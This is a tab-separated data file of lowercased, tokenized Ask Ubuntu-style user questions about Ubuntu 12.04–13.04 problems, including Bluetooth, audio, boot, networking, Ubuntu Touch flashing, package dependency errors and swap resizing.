342235	problem with bluetooth turning on in 12.04 ( kernel 3.2.0-34 generic ) on dell insprion 1520	i 've dell inspiron 1520 laptop and have installed 12.04 ubuntu in it , i 'm trying to turn on the bluetooth device on the system , in the notification bar it shows , bluetooth is turned on and under system setting > bluetooth it shows bluetooth is disabled , the soft buttons in the settings do n't respond . any help would be much appreciated . following are some commands and their output to aid resolve the issue . sheetal @ sheetal-inspiron-1520 : ~ $ hcitool dev devices : sheetal @ sheetal-inspiron-1520 : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 05a9:2640 omnivision technologies , inc. ov2640 webcam bus 003 device 002 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 003 device 003 : id 0a5c:4502 broadcom corp . keyboard ( boot interface subclass ) bus 003 device 004 : id 0a5c:4503 broadcom corp . mouse ( boot interface subclass ) sheetal @ sheetal-inspiron-1520 : ~ $ rfkill list 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no sheetal @ sheetal-inspiron-1520 : ~ $ dpkg -- get-selections blueman install bluetooth install bluez install bluez-alsa install bluez-cups install bluez-gstreamer install sheetal @ sheetal-inspiron-1520 : ~ $ ps -el | grep blue 5 s 0 1052 1 0 80 0 - 1185 poll_s ? 00:00:00 bluetoothd sheetal @ sheetal-inspiron-1520 : ~ $ lsmod | grep blue bluetooth 158438 10 bnep , rfcomm
342236	switching from jupiter to tlp	as the laptop battery saving applet jupiter is n't maintained anymore , i 've seen many recommendations to use tlp instead . there seems to be a couple of tlp installation and configuration tutorials around , but none of them ( that i 've read ) address the question if i should ( 1 ) remove jupiter first so that there will not be any problems/conflicts with tlp . if the answer is 'yes , get rid of jupiter first ' , then ( 2 ) how would i do that ? i installed jupiter a couple of upgrades ago by adding the ppa . currently i 'm sporting ubuntu 13.04 . [ update ] possibly solved : apparently just purging the jupiter install does the trick .
342237	in ubuntu 12.04 , odd whining/humming coming from left side of mbp ( 2,2 )	i have been searching for a similar issue to mine , but unfortunately have n't found anything . anyhow , this week i installed 12.04 on my 2006 mbp ( 2,2 ) . pretty much everything seems to work ok , but shortly after getting to the log-in screen , an audible whining/humming begins from the left hand side of the laptop . the sound is faint , but you can definitely hear it . phonetically , it sounds if you made a high-pitched `` eeeeeee '' sound . the sound is not constant , but persistent . it 'll sound for just a second or two then go away , then come back for a time , then go away ; almost like the long-short cadence of morse code . the stranger thing is that upon plugging in headphones , the sound is amplified greatly . when removed , the sound goes back to being very quiet . the audio from the speakers or headphones is n't garbled as far as i can tell , so i do n't know if this is a speaker issue . maybe a grounding thing ? however , i feel like i have taken away hardware as an issue for the most part . i still have os x on another partition , and the sound never occurs in os x , only ubuntu . my cpu temps in 12.04 sit idle around 60c , and they do in os x as well . when running a program or watching a video , the fans come on as the cpu temps go up , but the increase in fan speed sounds uniform and normal . i have had a fan replaced in this laptop before , so i have an idea of what it sounds like when ball bearings get out of place . i have tried turning down/off all sound related things in alsamixer , but that does't really do anything to stop the issue . i thought it might be a mic loop or something , but i have all sound off and the issue still stands . maybe there 's an internal speaker that is getting accessed that normally does n't in os x ? i 'm not sure . other than this sound , the os works fine . i do n't have any outstanding issues besides this one , weird thing . so , i dunno ( and if i did , i would n't be here , ha ! ) . if anyone has an idea of something i might be able to check or amend , i 'd be grateful to hear it . thanks ! edit : as i sit here testing the machine , i have noticed that the sound does go away when you play audio through the headphone jack , but it comes back when not in use . my test was to play a song from google play using headphones , and the sound does go away but is replaced with intermittent `` crunching '' from ... somewhere . weirdly , while in this state , moving the mouse via touchpad seems to cause the most occurrences of this `` crunch '' /static . there is a direct correlation for when i touch the pad to sound emitting from the machine , as though the power draw the pad takes when i touch it is affecting ... something . upon closing chrome , the high pitched sound comes back shortly . removing the power supply does alter the sound a bit , but it is still present . using solely battery power does not alleviate the issue , either . edit 2 : i think i may have stumbled upon the answer to my question . of course i would find it after i made this long post , but hopefully this post could help someone in the future . what worked ( so far ! ) for me . it turns out that some of the first generation mbps had a whining problem due to whatever the c-state is , some state of being the cpu enters when idle . due to a hardware glitch/bug , one c-state causes the computer to make a whining sound . so , what to do ? i give full credit to user piwacet at the ubuntuforums , and this was their solution : in a terminal : sudo su nano -w /etc/default/grub change the line in this file that reads like this : grub_cmdline_linux_default= '' quiet splash '' to : grub_cmdline_linux_default= '' quiet splash processor.max_cstate=2 '' save file ( ctrl-x ) execute : update-grub then exit the terminal and reboot . i have been listening to my mbp as i have been writing this , and i have n't heard anything abnormal like before . i ca n't guarantee that this is the best answer to this problem , but so far my computer is much quieter . the only downside is that it seems like it is running just a little warmer . before this ( when the whine/hum would sound ) , the cpu would run about 60c . as i have sat here writing and listening , the cpu temp has been sitting around 66c . it jumped to 71c a couple of times . i have no programs running besides the temp indicators .
342238	help can not change inotify watch number because file cant be over written	so i 'm trying to start using lsyncd for a more up to date backup system . the problem that i have run into is that the directory that i have to backup contains more than 250,000 items and i would like to increase the watch size naturally to something like 300,000 watch items , a number that the architects in the office wont reach for a long time . so when i go to do that i access the watch plain text file via : sudo gedit /proc/sys/fs/inotify/max_user_watches and change to 300,000 . i hit save but even as sudo it wont let me save the darn file . i have tried doing the same operation while the daemon is off then starting it , check it , still not changed . the exact error that i get is : could not create a backup file while saving /proc/sys/fs/inotify/max_user_watches so my question is how to effectively change that file 's contents from 8192 to 300,000
342242	windows 8 not booting	i have a dell inspiron laptop , with windows 8 pre-installed . i upgraded it to windows 8.1 preview . a few days later i tried to install ubuntu 13.04 ( via usb ) , it got installed ( separate partition created via windows ) . but would not load , instead windows loaded . so after a bit of googling i ran boot repair , and then both my os 's were gone . no option to boot any os . so i installed ubuntu via usb again . it is working fine now . but i want to know how bad have i screwed my windows , would i be able to get it back running , if not would i be loosing my other files as well ? pfb the paste link for my system . http : //paste.ubuntu.com/6070953/ a summary of my system . dell inspiron 7520 ( 64 bit ) windows 8.1 preview 8 gb ram , 1 tb hdd uefi something , secure boot is off as of now .
342247	ca n't install adobe-flash-properties-gtk	i am trying to see whether i can alter the settings of flash to reduce the huge memory footprintâwhether that succeeds is another issueâand came across advice regarding a settings tool that i am under the impression is in this package : https : //launchpad.net/ubuntu/precise/+package/adobe-flash-properties-gtk to be clear , i am sure i am running precise . i suspect i am supposed to add a ppa here but i ca n't find the info on what its name is .
342250	search only the current directory on key press in ubuntu 13.04	i am currently using 13.04 . till 12.10 in file browser ( nautilus ) pressing any key press will select the directory starting with that key . for example when i do the below opening a nautilus press d ( all folder that starts with d will be selected and not the subfolders ) whereas in ubuntu 13.04 it searches all the folders in the current directories and in sub directories too . is it possible to restrict the search only to current directories by any configuration . thanks for your guidance .
342254	ubuntu 12.04 not booting on virtual box	i installed ubuntu 12.04 on virtual box yesterday and it worked perfectly fine all day . however , when i restarted my laptop this morning , it is n't getting past the loading screen . i 'm not getting any error but the screen just shows ubuntu with the loading complete , yet nothing happens . could you please help me ? thanks !
342259	no hardware listed in sound settings , but audio works , failed after selecting a different output . 13.04	the audio was working fine , all hardware listed , but i made the mistake of selecting a different output . the audio stopped working , for a while , i reinstalled pulseaudio and managed to get sound back . however , no hardware is listed in the sound settings , either input or output ... all greyed out ! is there a way to reset the sound settings ? is there a config file perhaps ? 01:00.1 audio device : nvidia corporation gf114 hdmi audio controller ( rev a1 ) subsystem : clevo/kapok computer device 5102 flags : bus master , fast devsel , latency 0 , irq 17 memory at f6080000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel i seem to have to do a fresh install every few months , getting a real pain , any ideas on how to fix this would be good : - ) thanks
342262	listmodel in qml : how to retain listmodel values on page switch in page stack	i have an xml file to show list of items ( listview ) , on click of each item i am switching to page which reads the xmllistmodel for each category using pagestack.push . after pressing back and again going to same page results in lost of listmodel data . how to modularize the code into several qml files without loosing the listmodel data information . please let me know . attaching the sample snippet . main.qml if ( currentpagename == `` menuname '' ) { pagestack.push ( qt.resolvedurl ( `` showchosenlist.qml '' ) ) ; } showchosenlist.qml listmodel { id : hotelmainmenumodel } xmllistmodel { id : hotelmainmenufetch source : `` hotelmenu.xml '' query : `` /hotelmenu/menucategories/categorylist/mainmenu '' onstatuschanged : { if ( status === xmllistmodel.ready ) { for ( var i = 0 ; i < count ; i++ ) { hotelmainmenumodel.append ( { `` name '' : get ( i ) .name , `` displaytext '' : get ( i ) .name , `` pagename '' : get ( i ) .pagename } ) } } } xmlrole { name : `` name '' ; query : `` name/string ( ) '' } xmlrole { name : `` pagename '' ; query : `` pagename/string ( ) '' } } }
342266	can not connect to a specific wireless router	i bought a new router this summer ( asus rt-ac66u ) , but returned because it was defect and got a new one . this new one i got works on all of my devices except for my desktop , which is my only device that uses 5ghz . i am running 12.04 ( elementary os ) , and my wireless networks card is a tp-link tl-wdn4800 n900 ( which i bought specifically for good linux support ) . i have wpa-psk2 and aes on the router , and in nm-connection-editor i have selected 'wpa & wpa2 personal ' and someone said that aes is default in networkmanager . when trying to connect , it takes a very long time , and after a while it asks for my password once again . before i updated the router to the latest verion ( which i hoped would solve the problem ) , 2.4ghz worked actually but not any more . when comparing the 2.4 and 5ghz networks in /etc/networkmanager/system-connections/ they have the exact same configuration this is the error message for 2.4ghz from dmesg wlan0 : deauthenticated from 08:60:6e : bd : c5:90 ( reason : 15 ) and here 's the whole log for dmesg 2.4ghz : http : //pastebin.com/9qnwjat3 and this is 5ghz [ 3122.594511 ] wlan0 : deauthenticating from 08:60:6e : bd : c5:90 by local choice ( reason=3 ) and here 's the info for my wireless card 03:00.0 network controller : qualcomm atheros ar93xx wireless network adapter ( rev 01 ) subsystem : qualcomm atheros device 3112 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 4 bytes interrupt : pin a routed to irq 19 region 0 : memory at fd8c0000 ( 64-bit , non-prefetchable ) [ size=128k ] [ virtual ] expansion rom at fdf00000 [ disabled ] [ size=64k ] capabilities : < access denied > kernel driver in use : ath9k kernel modules : ath9k the wierdest thing is that it works for all of my other devices which are : 2 android phones 1 android tablet 2 linux laptops system76 gazelle proffesional running 13.10 lenovo running 12.04 elementary os with a broadcom chip thank you in advance !
342272	set backupdir remove my files	i was trying to create seperate folder for my ~files by using command set backupdir =./.backup , . , /tmp but now all my files from my home folder got deleted . they were really important files and i am not able to find them anywhere . can someone please help me
342274	how do i create an encrypted growable disk image ?	i do n't want to encrypt my whole home directory , just my work folder . so i figured that having my work stuff in an encrypted iso would be a good idea . how do i create an iso ? how do i encrypt that iso ? how do i make the iso grow as the contents grow ? ( having it only take up as much space as it needs to )
342276	experiencing major issues on graphic displays	since installing ubuntu 12.04 , i am experiencing low performance on graphic programs , including video playbacks , etc . as i have checked the intel driver of mine is already at its latest version . it 's really occuring meanwhile playback of videos or web-flash videos ( youtube , etc ) os is being logged out automatically and just display an error reporting of xorg windows for me . i can not actually playback hd videos with the normal frame rate as well . here are some initiation of my graphic card details : *-display:0 description : vga compatible controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 07 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:45 memory : f6c00000-f6ffffff memory : e0000000-efffffff ioport : efe8 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 07 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : f6b00000-f6bfffff and the intel model : 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) edited : a little more information : no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise username info : linux amir-laptop 3.2.0-53-generic-pae # 81-ubuntu smp thu aug 22 21:23:47 utc 2013 i686 i686 i386 gnu/linux xorg info : ii xserver-xorg-video-intel 2:2.17.0-1ubuntu4.4 x.org x server -- intel i8xx , i9xx display driver
342281	how to keep the coloring in bash when using `sudo -i` ?	i have changed ps1 variable in /etc/bash.bashrc to ps1= '' \n\ [ \033 [ 0 ; 37m\ ] \342\224\214\342\224\200\ $ ( if [ [ \ $ ? == 0 ] ] ; then echo \ '' [ \ [ \033 [ 0 ; 32m\ ] \ [ \033 [ 01 ; 32m\ ] \342\234\223\ [ \033 [ 0 ; 37m\ ] ] \342\224\200\ '' ; else echo \ '' [ \ [ \033 [ 0 ; 32m\ ] \ [ \033 [ 01 ; 31m\ ] \342\234\227\ [ \033 [ 0 ; 37m\ ] ] \342\224\200\ '' ; fi ) [ $ ( if [ [ $ { euid } == 0 ] ] ; then echo '\ [ \033 [ 0 ; 31m\ ] \h ' ; else echo '\ [ \033 [ 0 ; 33m\ ] \u\ [ \033 [ 0 ; 37m\ ] @ \ [ \033 [ 0 ; 96m\ ] \h ' ; fi ) \ [ \033 [ 0 ; 37m\ ] ] \342\224\200 [ \ [ \033 [ 0 ; 32m\ ] \w\ [ \033 [ 0 ; 37m\ ] ] \n\ [ \033 [ 0 ; 37m\ ] \342\224\224\342\224\200\342\224\200\342\225\274 \ [ \033 [ 0m\ ] '' which works fine with all the commands . but when i run sudo -i command , ps1 value goes to the default . to get back the color scheme , i have to run ps1= < same value > manually . any idea what might be causing this behaviour ?
342282	how linux host can access guest 's sharing network on virtualbox ?	i have windows 7 as a guest with ubuntu host , the windows got an internet access via usb modem which is not available for linux . i have enabled sharing on windows network and assigned an ip , netmask and getway to that network and to vboxnet0 , the ping was successful but i 've got a one problem . how ubuntu can detect the guest 's network so it can connect to it ?
342285	i have an old piece of hardware i want to run ubuntu , can i reformat using the 13.04 download on my dell 700m ?	i recently recovered my dell inspiron 700m from my collection of old hardware . i have a ton of old files and programs on it , none of which i need . i want to install ubuntu and make it a running machine again . can i replace the windows operating system and reformat with the new ubuntu 13.04 download ?
342290	can not create folder and file on external drive ( xfce , thunar ) after change of mount point	i wanted to have an ntfs partition mounted at startup , so i used this solution to mount it automatically . ( using a program to set the automatic mounting : `` storage device manager '' - pysdm . ) at a certain point i wanted this for an external drive ( fat32 ) that is most of the time connected to the computer , which was not usually mounted when the computer started . all went well until i noticed that in thunar it was not possible to create new folder ( or file ) - the option was greyed out - on the external drive ( while on the ntfs partition all was well ) : i have also noticed that the use of the `` storage device manager '' in the way presented by the linked answer had changed the mount point of the drives involved : before , external drive 's point had been /media/cipricus/samsung/ , now it is /media/sdb1/ ; the ntfs drive had the mount point /media/cipricus/3060-0887/ and now it is /media/sda5/ . ( but , as specified , there is no problem with the ntfs partition . ) uninstalling the program and trying to go back to the older situation did n't work , the partition and the external drive continued to mount at the new mount points . update : i was able to revert to the old mount points by using the same program , but this did not solve the issue with the external drive . even worse , i had to un-check the options for mounting at boot for both drives involved for the boot was stopped with an error message that mounting them was not possible . what i want is to find a way to go back to the situation from before installing the program and making those settings in the first place . ( a second external drive , for which i did n't used `` storage device manager '' to make it mount at startup , keeps mounting the usual way , /media/cipricus/usb-hdd/ , and i can create folders on that one . )
342294	restore networking after failed and rolled back vpn setup	at some point i tried to set up vpn on my home server , but could n't get it to work . so i finally decided to roll the setup back ( uninstalled openvpn ) as i did n't really need it , but now the server can not access the internet ( though it is reachable from and can see the local network ) . by can not access the internet i mean that i can not ping neither ip 's nor addresses or use e.g . nslookup . i asked a colleague and he 's guess was that the problem was in the routing table . the output from route on the broken system is : kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.0.1 0.0.0.0 ug 100 0 0 eth0 192.168.0.0 * 255.255.255.0 u 0 0 0 eth0 and the output from another functioning machine on the same network is : kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 link-local * 255.255.0.0 u 1000 0 0 eth0 192.168.0.0 * 255.255.255.0 u 1 0 0 eth0 just in case the routing table is n't the problem in this pastebin is the output of several networking commands that may be useful in troubleshooting : http : //paste.ubuntu.com/6071536/ and the /etc/network/interfaces is http : //paste.ubuntu.com/6071566/ ( there is some static ip stuff in there that i disable during the trouble-shooting ) can any of you help me fix the system . i will gladly provide any further needed information .
342295	youtube does not work with cookies enabled on ubuntu 13.04	youtube has an awkward problem . i can not watch any videos unless i disable cookies for www.youtube.com and it bothers me to do this . this is probably not a flash issue since it can be solved by configuring the browser , but i do n't know if it is a linux problem or youtube 's fault . does anybody else experience this or do you guys watch youtube with no problems on linux ?
342298	galaxy nexus fails to boot after unsuccessful ubuntu touch installation	i tried to install ubuntu touch on my new galaxy nexus toro ( which i bought today specifically for ubuntu touch ) . i followed the instructions i found at https : //wiki.ubuntu.com/touch/install ( installed all the packages , made android backup , unlocked the phone ) until i accidentally executed phablet-flash cdimage-touch -d grouper -b instead of phablet-flash cdimage-touch -b it gave me this output : igor @ igor-inspiron-n5110 : ~ $ phablet-flash cdimage-touch -d grouper -b info : phablet-flash : device detected as grouper info : phablet-flash : download directory set to /home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1 info : phablet-flash : download directory set to /home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1 info : urllib3.connectionpool : starting new http connection ( 1 ) : cdimage.ubuntu.com info : phablet-flash : downloading http : //cdimage.ubuntu.com/ubuntu-touch/daily-preinstalled/20130905.1/saucy-preinstalled-recovery-armel+grouper.img to /home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1/saucy-preinstalled-recovery-armel+grouper.img -- 2013-09-06 21:42:14 -- http : //cdimage.ubuntu.com/ubuntu-touch/daily-preinstalled/20130905.1/saucy-preinstalled-recovery-armel+grouper.img resolving cdimage.ubuntu.com ( cdimage.ubuntu.com ) ... 91.189.92.174 , 2001:67c:1360:8c01 : :20 , 2001:67c:1360:8c01 : :21 , ... connecting to cdimage.ubuntu.com ( cdimage.ubuntu.com ) |91.189.92.174|:80 ... connected . http request sent , awaiting response ... 200 ok length : 7344128 ( 7,0m ) [ application/octet-stream ] saving to : ‘/home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1/saucy-preinstalled-recovery-armel+grouper.img’ 100 % [ ====================================== > ] 7 344 128 1,73mb/s in 4,6s 2013-09-06 21:42:18 ( 1,53 mb/s ) - ‘/home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1/saucy-preinstalled-recovery-armel+grouper.img’ saved [ 7344128/7344128 ] info : phablet-flash : downloading http : //cdimage.ubuntu.com/ubuntu-touch/daily-preinstalled/20130905.1/saucy-preinstalled-system-armel+grouper.img to /home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1/saucy-preinstalled-system-armel+grouper.img -- 2013-09-06 21:42:18 -- http : //cdimage.ubuntu.com/ubuntu-touch/daily-preinstalled/20130905.1/saucy-preinstalled-system-armel+grouper.img resolving cdimage.ubuntu.com ( cdimage.ubuntu.com ) ... 91.189.92.174 , 2001:67c:1360:8c01 : :1f , 2001:67c:1360:8c01 : :20 , ... connecting to cdimage.ubuntu.com ( cdimage.ubuntu.com ) |91.189.92.174|:80 ... connected . http request sent , awaiting response ... 200 ok length : 68095300 ( 65m ) [ application/octet-stream ] saving to : ‘/home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1/saucy-preinstalled-system-armel+grouper.img’ 100 % [ ====================================== > ] 68 095 300 2,07mb/s in 32s 2013-09-06 21:42:51 ( 2,02 mb/s ) - ‘/home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1/saucy-preinstalled-system-armel+grouper.img’ saved [ 68095300/68095300 ] info : phablet-flash : downloading http : //cdimage.ubuntu.com/ubuntu-touch/daily-preinstalled/20130905.1/saucy-preinstalled-boot-armhf+grouper.img to /home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1/saucy-preinstalled-boot-armhf+grouper.img -- 2013-09-06 21:42:51 -- http : //cdimage.ubuntu.com/ubuntu-touch/daily-preinstalled/20130905.1/saucy-preinstalled-boot-armhf+grouper.img resolving cdimage.ubuntu.com ( cdimage.ubuntu.com ) ... 91.189.92.174 , 2001:67c:1360:8c01 : :21 , 2001:67c:1360:8c01 : :1f , ... connecting to cdimage.ubuntu.com ( cdimage.ubuntu.com ) |91.189.92.174|:80 ... connected . http request sent , awaiting response ... 200 ok length : 7501824 ( 7,2m ) [ application/octet-stream ] saving to : ‘/home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1/saucy-preinstalled-boot-armhf+grouper.img’ 100 % [ ====================================== > ] 7 501 824 1,74mb/s in 4,5s 2013-09-06 21:42:56 ( 1,58 mb/s ) - ‘/home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1/saucy-preinstalled-boot-armhf+grouper.img’ saved [ 7501824/7501824 ] info : phablet-flash : restarting device ... wait info : phablet-flash : restarting device ... wait complete warning : phablet-flash : device needs to be unlocked for the following to work info : phablet-flash : flashing system to /home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1/saucy-preinstalled-system-armel+grouper.img < waiting for device > erasing 'system ' ... okay [ 0.044s ] sending 'system ' ( 66499 kb ) ... okay [ 7.697s ] writing 'system ' ... okay [ 5.756s ] finished . total time : 13.496s info : phablet-flash : flashing boot to /home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1/saucy-preinstalled-boot-armhf+grouper.img sending 'boot ' ( 7326 kb ) ... okay [ 0.859s ] writing 'boot ' ... okay [ 0.443s ] finished . total time : 1.302s info : phablet-flash : flashing recovery to /home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1/saucy-preinstalled-recovery-armel+grouper.img sending 'recovery ' ( 7172 kb ) ... okay [ 0.836s ] writing 'recovery ' ... okay [ 0.458s ] finished . total time : 1.295s info : phablet-flash : booting /home/igor/downloads/phablet-flash/ubuntu-touch/20130905.1/saucy-preinstalled-recovery-armel+grouper.img downloading 'boot.img ' ... okay [ 0.828s ] booting ... okay [ 0.399s ] finished . total time : 1.227s info : phablet-flash : clearing /data and /cache error : device not found error : phablet-flash : command 'adb shell mount /data ' returned non-zero exit status 255 after that , it rebooted the phone , and it the only thing it showed me was a black screen with a picture of a lock and the word `` google '' in the middle . the phone did not reacted on pressing any buttons , including the power button . adb did n't see the device : ~ $ adb devices * daemon not running . starting it now on port 5037 * * daemon started successfully * list of devices attached ~ $ , which prevented me from restoring android as it described at https : //wiki.ubuntu.com/touch/install . i tried to reboot it by holding power button , it did n't help . than i rebooted by unplugging the battery . after that , i tried to boot in recovery mode , but it only showed me aforementioned black screen . adb still does n't see the device . what can i do now ? where else can i seek for help ?
342299	zsh is not launched while opening a new terminal with `gnome-terminal`	i am using ubuntu 12.04 and started using zsh . the way i changed my shell is $ sudo chsh -s /usr/bin/zsh i changed my prompt theme etc and the changes kicked in . when i do a echo $ shell i can see that zsh is my shell . but when i open a new terminal bash seems to be my shell . however when su to a different user and su back zsh seems to be the shell . please advise .
342302	add steadyflow to startup apps	what 's the command to add steadyflow download manager to startup apps list ?
342303	what is the diference between the images of ubuntu touch ?	in the ubuntu touch installation page , there is this command that will wipe out the phone data and install ubuntu touch , but has 4 different options , what 's the difference between each of them ? cdimage-touch cdimage-legacy ubuntu-system community to install the ubuntu touch developer preview on your device , you will need to execute the command below . please note , this will wipe the contents of the device so ensure you have made a back-up . to install and get updates , run the following command : phablet-flash ( cdimage-touch|cdimage-legacy|ubuntu-system|community ) -b
342306	first update lost wireless	i 'm using ubuntu 12.04 lts and i use a dlink wireless adapter to connect to the internet and after my first update and a reboot i lost wireless connect completely and i 've looked around and tried remove bcmwl-kernal-source but on the terminal it said it could n't be found so nothing was removed . how can i get my internet back ?
342307	dependency errors in ubuntu installation	i 'm trying to fix an apt setup in an ubuntu server to which i only have ssh access and ca n't make head or tail of the dependency errors . i 've run sudo apt-get install -f , and get the following : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up ssl-cert ( 1.0.23ubuntu2 ) ... dpkg : error processing ssl-cert ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of postgresql-common : postgresql-common depends on ssl-cert ( > = 1.0.11 ) ; however : package ssl-cert is not configured yet . dpkg : error processing postgresql-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of postgresql-8.4 : postgresql-8.4 depends on postgresql-common ( > = 104~ ) ; however : package postgresql-common is not configured yet . postgresql-8.4 depends on ssl-cert ; however : package ssl-cert is not configured yet . dpkg : error processing postgresql-8.4 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of postgresql : postgresql depends on postgresql-8.4 ; however : package postgresql-8.4 is not configured yet . dpkg : error processing postgresql ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : ssl-cert postgresql-common postgresql-8.4 postgresql e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what exactly does this mean ? is there a circular dependency ? i 've tried installing the required dependency ssl-cert but it does n't work either . i ca n't use dpkg directly either . any tips on how to resolve this , or could someone help me to better understand the problem ? is there any additional information that i should provide ? === edit : running sudo sh -x /path/to/config.postinst configure yields the following output : + . /usr/share/debconf/confmodule + [ ! ] + perl_dl_nonlazy=1 + export perl_dl_nonlazy + [ ] + exec /usr/share/debconf/frontend /var/lib/dpkg/info/ssl-cert.postinst configure does that mean that the script fails to execute the last line ? running sudo /usr/share/debconf/frontend /var/lib/dpkg/info/ssl-cert.postinst configure completes silently but a subsequent echo $ ? yields 1 , indicating that an error did occur . when i add set -x to the top of the file , and then run the sudo ... frontend ... configure command , it fails at : make-ssl-cert generate-default-snakeoil set -xing this file as well fails at : openssl req -config /tmp/tmp.wpl6nkzkym -new -x509 -days 3650 -nodes -out /etc/ssl/certs/ssl-cert-snakeoil.pem -keyout /etc/ssl/private/ssl-cert-snakeoil.key running this command with sudo gives : generating a 1024 bit rsa private key ... ... ... ... ... ... ... ++++++ ... ... ... ... ... ... ... ..++++++ writing new private key to '/etc/ssl/private/ssl-cert-snakeoil.key' -- -- - problems making certificate request 53829 : error:0d07a097 : asn1 encoding routines : asn1_mbstring_ncopy : string too long : a_mbstr.c:154 : maxsize=64 i 'm not familiar with openssl ; what 's going on here ? ( also , should i fork this to a new question ? has this question 's scope been exceeded ? )
342313	increase cryptswap size	my cryptswap is now 4gb . i upgraded my ram and i 'd like to increase the swap accordingly to approx 8gb . so far , i 've reduced the size of my main sda1 partition with gparted by 4gb and i 'm left with 4gb of unallocated space . next , i wanted to increase the swapsize of sda2 but gparted returns this error : gparted 0.12.1 -- enable-libparted-dmraid libparted 2.3 move /dev/sda2 to the left and grow it from 3.88 gib to 7.79 gib 00:00:01 ( error ) calibrate /dev/sda2 00:00:00 ( success ) path : /dev/sda2 start : 616,994,814 end : 625,141,759 size 8,146,946 ( 3.88 gib ) move partition to the left and grow it from 3.88 gib to 7.79 gib 00:00:00 ( error ) old start : 616,994,814 old end : old size : 8,146,946 ( 3.88 gib ) requested start : 608,800,768 requested end : 625,139,711 requested size : 16,338,944 ( 7.79 gib ) libparted messages ( info ) unable to satisfy all constraints on the partition . ca n't have overlapping partitions . i do n't understand the statement ca n't have overlapping partitions . the partitions do not overlap . the output of swapon -s returns /dev/mapper/cryptswap1 partition 4073468 0 -1 i guess the issue i encountered with gparted is related to cryptswap ?
342315	problem in opening file	when i use `` locate filename '' , it 's path is shown in terminal , but when i try to open it using that path it does n't get opened . even it is not displayed with ls or ls -a command . can somebody help me ? ? enter code here priyanka @ priyanka-svs13112ens : ~ $ locate *.hs /home/priyanka/hskl.hs /home/priyanka/hskl2.hs /home/priyanka/hsklas.hs /home/priyanka/parser1.hs /home/priyanka/try.hs priyanka @ priyanka-svs13112ens : ~ $ ls /home/priyanka/ desktop
342317	how do i perform maintenance on a master dns/dhcp ( bind9/isc-dhcp ) ubuntu server ?	i 'm running non-gui ubuntu server 12.04.2 lts ( 64-bit ) on my 2 dns/dhcp servers . both servers are running bind9 9.8.1-p1 and isc-dhcp-server 4.1.esv-r4-0ubuntu5.6 . please note that for dns i 'm running them in a master/slave configuration , and for dhcp they are running a failover configuration . ideally , i 'd like to perform maintenance on the master/primary first , and once it 's back up and running , i 'd like to then take care of the secondary/slave . maintenance will consist of installing various updates and performing a restart . i 'm uncertain how to gracefully bring each machine down without losing/interrupting service . any advice is greatly appreciated !
342319	where are mtp mounted devices located in the filesystem ?	i have an android phone that connects with my computer via mtp . this works fine ; i can see and transfer files with nautilus . however , i often want to use the terminal to move large numbers of files , and i can not seem to find the device anywhere in the filesystem tree . nautilus reports the location as mtp : // [ usb:003,007 ] / , but it 's not under /media or /mnt . does anyone know where it is ?
